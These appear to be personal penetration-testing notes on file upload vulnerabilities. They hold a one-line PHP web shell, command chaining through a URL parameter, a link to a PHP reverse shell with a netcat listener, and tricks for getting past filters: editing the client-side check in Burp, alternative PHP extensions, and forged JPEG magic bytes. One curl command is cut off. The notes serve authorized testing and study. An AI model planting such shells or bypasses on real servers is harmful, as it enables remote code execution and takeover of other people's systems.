Pentest Notes / Exploitation / Web Exploitation
File upload
File Upload Vulnerabilities
Server headers in response: Burpsuite also helps in this by looking at the response sent by the server.
File can be overwritten?
Inspect images and look for the file name in the src attribute
Simple Web Shell
echo system($_GET["cmd"]); ?>
• After uploading: find out where it is stored
• To test for remote code execution:
• At the end of the URL, add:
?cmd=ls;[command2];[command3]
Proper shell: Pentest Monkey reverse shell
Source code: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Change the IP
Start netcat listener:
nc -lvnp 1234
Client side filtering
• Reload the page in burpsuite
• Right click on intercepted data:
Do Intercept > Response to this request
• Remove the script that checks for file types and then forward the response.
Directly sending the file to the upload point:
curl -X POST -F "submit:
Server Side: File Extensions
Php Extensions:
.php3 .php4 .php5 .php7 .phps .php-s .pht .phar
• Test with a valid file, jpg or png. Eg: shell.jpg
• Test with file extension having valid part but with different extension: shell.jpg.php
Server Side: Magic Numbers
**Magic number of JPEG files: **
FF D8 FF DB
• Add 4 random character in the start of file.
• Open it in hexeditor and change the bits in the beginning to the above magic number.
• file filename to check the file type.